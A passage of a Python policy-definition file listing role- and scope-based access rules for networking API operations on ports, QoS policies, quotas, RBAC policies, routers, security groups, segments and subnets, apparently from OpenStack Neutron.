"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``ip_address`` of ``allowed_address_pairs`` attribute when creating a port",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="get_port",
check_str=(
"rule:context_is_advsvc or (role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a port",
scope_types=["project", "system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:binding:vif_type",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``binding:vif_type`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:binding:vif_details",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``binding:vif_details`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:binding:host_id",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``binding:host_id`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:binding:profile",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``binding:profile`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="get_port:resource_request",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``resource_request`` attribute of a port",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/ports"},
{"method": "GET", "path": "/ports/{id}"},
],
),
base.APIRule(
name="update_port",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:context_is_advsvc"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:device_owner",
check_str=(
"not rule:network_device or rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``device_owner`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:mac_address",
check_str=("role:admin and system_scope:all or rule:context_is_advsvc"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``mac_address`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:fixed_ips",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``fixed_ips`` information when updating a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:fixed_ips:ip_address",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify IP address in ``fixed_ips`` information when updating a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:fixed_ips:subnet_id",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:shared"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify subnet ID in ``fixed_ips`` information when updating a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:port_security_enabled",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``port_security_enabled`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:binding:host_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``binding:host_id`` attribute of a port",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:binding:profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``binding:profile`` attribute of a port",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:binding:vnic_type",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:context_is_advsvc"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``binding:vnic_type`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:allowed_address_pairs",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``allowed_address_pairs`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:allowed_address_pairs:mac_address",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``mac_address`` of ``allowed_address_pairs`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:allowed_address_pairs:ip_address",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``ip_address`` of ``allowed_address_pairs`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="update_port:data_plane_status",
check_str=("role:admin and system_scope:all or role:data_plane_integrator"),
basic_check_str=("role:admin"),
description="Update ``data_plane_status`` attribute of a port",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/ports/{id}"}],
),
base.APIRule(
name="delete_port",
check_str=(
"rule:context_is_advsvc or (role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a port",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/ports/{id}"}],
),
base.APIRule(
name="get_policy",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="Get QoS policies",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/policies"},
{"method": "GET", "path": "/qos/policies/{id}"},
],
),
base.APIRule(
name="create_policy",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a QoS policy",
scope_types=["system"],
operations=[{"method": "POST", "path": "/qos/policies"}],
),
base.APIRule(
name="update_policy",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a QoS policy",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/qos/policies/{id}"}],
),
base.APIRule(
name="delete_policy",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a QoS policy",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/qos/policies/{id}"}],
),
base.APIRule(
name="get_rule_type",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get available QoS rule types",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/rule-types"},
{"method": "GET", "path": "/qos/rule-types/{rule_type}"},
],
),
base.APIRule(
name="get_policy_bandwidth_limit_rule",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS bandwidth limit rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/policies/{policy_id}/bandwidth_limit_rules"},
{
"method": "GET",
"path": "/qos/policies/{policy_id}/bandwidth_limit_rules/{rule_id}",
},
],
),
base.APIRule(
name="create_policy_bandwidth_limit_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a QoS bandwidth limit rule",
scope_types=["system"],
operations=[
{"method": "POST", "path": "/qos/policies/{policy_id}/bandwidth_limit_rules"},
],
),
base.APIRule(
name="update_policy_bandwidth_limit_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a QoS bandwidth limit rule",
scope_types=["system"],
operations=[
{
"method": "PUT",
"path": "/qos/policies/{policy_id}/bandwidth_limit_rules/{rule_id}",
},
],
),
base.APIRule(
name="delete_policy_bandwidth_limit_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a QoS bandwidth limit rule",
scope_types=["system"],
operations=[
{
"method": "DELETE",
"path": "/qos/policies/{policy_id}/bandwidth_limit_rules/{rule_id}",
},
],
),
base.APIRule(
name="get_policy_dscp_marking_rule",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS DSCP marking rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/policies/{policy_id}/dscp_marking_rules"},
{"method": "GET", "path": "/qos/policies/{policy_id}/dscp_marking_rules/{rule_id}"},
],
),
base.APIRule(
name="create_policy_dscp_marking_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a QoS DSCP marking rule",
scope_types=["system"],
operations=[{"method": "POST", "path": "/qos/policies/{policy_id}/dscp_marking_rules"}],
),
base.APIRule(
name="update_policy_dscp_marking_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a QoS DSCP marking rule",
scope_types=["system"],
operations=[
{"method": "PUT", "path": "/qos/policies/{policy_id}/dscp_marking_rules/{rule_id}"},
],
),
base.APIRule(
name="delete_policy_dscp_marking_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a QoS DSCP marking rule",
scope_types=["system"],
operations=[
{
"method": "DELETE",
"path": "/qos/policies/{policy_id}/dscp_marking_rules/{rule_id}",
},
],
),
base.APIRule(
name="get_policy_minimum_bandwidth_rule",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS minimum bandwidth rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/qos/policies/{policy_id}/minimum_bandwidth_rules"},
{
"method": "GET",
"path": "/qos/policies/{policy_id}/minimum_bandwidth_rules/{rule_id}",
},
],
),
base.APIRule(
name="create_policy_minimum_bandwidth_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a QoS minimum bandwidth rule",
scope_types=["system"],
operations=[
{"method": "POST", "path": "/qos/policies/{policy_id}/minimum_bandwidth_rules"},
],
),
base.APIRule(
name="update_policy_minimum_bandwidth_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a QoS minimum bandwidth rule",
scope_types=["system"],
operations=[
{
"method": "PUT",
"path": "/qos/policies/{policy_id}/minimum_bandwidth_rules/{rule_id}",
},
],
),
base.APIRule(
name="delete_policy_minimum_bandwidth_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a QoS minimum bandwidth rule",
scope_types=["system"],
operations=[
{
"method": "DELETE",
"path": "/qos/policies/{policy_id}/minimum_bandwidth_rules/{rule_id}",
},
],
),
base.APIRule(
name="get_alias_bandwidth_limit_rule",
check_str=("rule:get_policy_bandwidth_limit_rule"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS bandwidth limit rule through alias",
scope_types=["project"],
operations=[{"method": "GET", "path": "/qos/alias_bandwidth_limit_rules/{rule_id}/"}],
),
base.APIRule(
name="update_alias_bandwidth_limit_rule",
check_str=("rule:update_policy_bandwidth_limit_rule"),
basic_check_str=("role:admin"),
description="Update a QoS bandwidth limit rule through alias",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/qos/alias_bandwidth_limit_rules/{rule_id}/"}],
),
base.APIRule(
name="delete_alias_bandwidth_limit_rule",
check_str=("rule:delete_policy_bandwidth_limit_rule"),
basic_check_str=("role:admin"),
description="Delete a QoS bandwidth limit rule through alias",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/qos/alias_bandwidth_limit_rules/{rule_id}/"}],
),
base.APIRule(
name="get_alias_dscp_marking_rule",
check_str=("rule:get_policy_dscp_marking_rule"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS DSCP marking rule through alias",
scope_types=["project"],
operations=[{"method": "GET", "path": "/qos/alias_dscp_marking_rules/{rule_id}/"}],
),
base.APIRule(
name="update_alias_dscp_marking_rule",
check_str=("rule:update_policy_dscp_marking_rule"),
basic_check_str=("role:admin"),
description="Update a QoS DSCP marking rule through alias",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/qos/alias_dscp_marking_rules/{rule_id}/"}],
),
base.APIRule(
name="delete_alias_dscp_marking_rule",
check_str=("rule:delete_policy_dscp_marking_rule"),
basic_check_str=("role:admin"),
description="Delete a QoS DSCP marking rule through alias",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/qos/alias_dscp_marking_rules/{rule_id}/"}],
),
base.APIRule(
name="get_alias_minimum_bandwidth_rule",
check_str=("rule:get_policy_minimum_bandwidth_rule"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a QoS minimum bandwidth rule through alias",
scope_types=["project"],
operations=[{"method": "GET", "path": "/qos/alias_minimum_bandwidth_rules/{rule_id}/"}],
),
base.APIRule(
name="update_alias_minimum_bandwidth_rule",
check_str=("rule:update_policy_minimum_bandwidth_rule"),
basic_check_str=("role:admin"),
description="Update a QoS minimum bandwidth rule through alias",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/qos/alias_minimum_bandwidth_rules/{rule_id}/"}],
),
base.APIRule(
name="delete_alias_minimum_bandwidth_rule",
check_str=("rule:delete_policy_minimum_bandwidth_rule"),
basic_check_str=("role:admin"),
description="Delete a QoS minimum bandwidth rule through alias",
scope_types=["project"],
operations=[
{"method": "DELETE", "path": "/qos/alias_minimum_bandwidth_rules/{rule_id}/"},
],
),
base.APIRule(
name="get_quota",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a resource quota",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/quota"},
{"method": "GET", "path": "/quota/{id}"},
],
),
base.APIRule(
name="update_quota",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a resource quota",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/quota/{id}"}],
),
base.APIRule(
name="delete_quota",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a resource quota",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/quota/{id}"}],
),
base.APIRule(
name="create_rbac_policy",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=("role:admin"),
description="Create an RBAC policy",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/rbac-policies"}],
),
base.APIRule(
name="create_rbac_policy:target_tenant",
check_str=("role:admin and system_scope:all or rule:restrict_wildcard"),
basic_check_str=("role:admin"),
description="Specify ``target_tenant`` when creating an RBAC policy",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/rbac-policies"}],
),
base.APIRule(
name="update_rbac_policy",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=("role:admin"),
description="Update an RBAC policy",
scope_types=["project", "system"],
operations=[{"method": "PUT", "path": "/rbac-policies/{id}"}],
),
base.APIRule(
name="update_rbac_policy:target_tenant",
check_str=("role:admin and system_scope:all or rule:restrict_wildcard"),
basic_check_str=("role:admin"),
description="Update ``target_tenant`` attribute of an RBAC policy",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/rbac-policies/{id}"}],
),
base.APIRule(
name="get_rbac_policy",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get an RBAC policy",
scope_types=["project", "system"],
operations=[
{"method": "GET", "path": "/rbac-policies"},
{"method": "GET", "path": "/rbac-policies/{id}"},
],
),
base.APIRule(
name="delete_rbac_policy",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=("role:admin"),
description="Delete an RBAC policy",
scope_types=["project", "system"],
operations=[{"method": "DELETE", "path": "/rbac-policies/{id}"}],
),
base.APIRule(
name="create_router",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a router",
scope_types=["project"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:distributed",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``distributed`` attribute when creating a router",
scope_types=["system"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:ha",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``ha`` attribute when creating a router",
scope_types=["system"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:external_gateway_info",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``external_gateway_info`` information when creating a router",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:external_gateway_info:network_id",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``network_id`` in ``external_gateway_info`` information when creating a router",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:external_gateway_info:enable_snat",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``enable_snat`` in ``external_gateway_info`` information when creating a router",
scope_types=["system"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="create_router:external_gateway_info:external_fixed_ips",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``external_fixed_ips`` in ``external_gateway_info`` information when creating a router",
scope_types=["system"],
operations=[{"method": "POST", "path": "/routers"}],
),
base.APIRule(
name="get_router",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a router",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/routers"},
{"method": "GET", "path": "/routers/{id}"},
],
),
base.APIRule(
name="get_router:distributed",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``distributed`` attribute of a router",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/routers"},
{"method": "GET", "path": "/routers/{id}"},
],
),
base.APIRule(
name="get_router:ha",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``ha`` attribute of a router",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/routers"},
{"method": "GET", "path": "/routers/{id}"},
],
),
base.APIRule(
name="update_router",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:distributed",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``distributed`` attribute of a router",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:ha",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``ha`` attribute of a router",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:external_gateway_info",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``external_gateway_info`` information of a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:external_gateway_info:network_id",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``network_id`` attribute of ``external_gateway_info`` information of a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:external_gateway_info:enable_snat",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``enable_snat`` attribute of ``external_gateway_info`` information of a router",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:external_gateway_info:external_fixed_ips",
check_str=("role:admin and system_scope:all"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``external_fixed_ips`` attribute of ``external_gateway_info`` information of a router",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="delete_router",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a router",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/routers/{id}"}],
),
base.APIRule(
name="add_router_interface",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Add an interface to a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}/add_router_interface"}],
),
base.APIRule(
name="remove_router_interface",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Remove an interface from a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}/remove_router_interface"}],
),
base.APIRule(
name="create_security_group",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a security group",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/security-groups"}],
),
base.APIRule(
name="get_security_group",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a security group",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/security-groups"},
{"method": "GET", "path": "/security-groups/{id}"},
],
),
base.APIRule(
name="update_security_group",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a security group",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/security-groups/{id}"}],
),
base.APIRule(
name="delete_security_group",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a security group",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/security-groups/{id}"}],
),
base.APIRule(
name="create_security_group_rule",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a security group rule",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/security-group-rules"}],
),
base.APIRule(
name="get_security_group_rule",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:sg_owner"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a security group rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/security-group-rules"},
{"method": "GET", "path": "/security-group-rules/{id}"},
],
),
base.APIRule(
name="delete_security_group_rule",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a security group rule",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/security-group-rules/{id}"}],
),
base.APIRule(
name="create_segment",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a segment",
scope_types=["system"],
operations=[{"method": "POST", "path": "/segments"}],
),
base.APIRule(
name="get_segment",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a segment",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/segments"},
{"method": "GET", "path": "/segments/{id}"},
],
),
base.APIRule(
name="update_segment",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a segment",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/segments/{id}"}],
),
base.APIRule(
name="delete_segment",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a segment",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/segments/{id}"}],
),
base.APIRule(
name="get_service_provider",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get service providers",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/service-providers"}],
),
base.APIRule(
name="create_subnet",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a subnet",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/subnets"}],
),
base.APIRule(
name="create_subnet:segment_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``segment_id`` attribute when creating a subnet",
scope_types=["system"],
operations=[{"method": "POST", "path": "/subnets"}],
),
base.APIRule(
name="create_subnet:service_types",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``service_types`` attribute when creating a subnet",
scope_types=["system"],
operations=[{"method": "POST", "path": "/subnets"}],
),
base.APIRule(
name="get_subnet",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a subnet",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/subnets"},
{"method": "GET", "path": "/subnets/{id}"},
],
),
base.APIRule(
name="get_subnet:segment_id",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
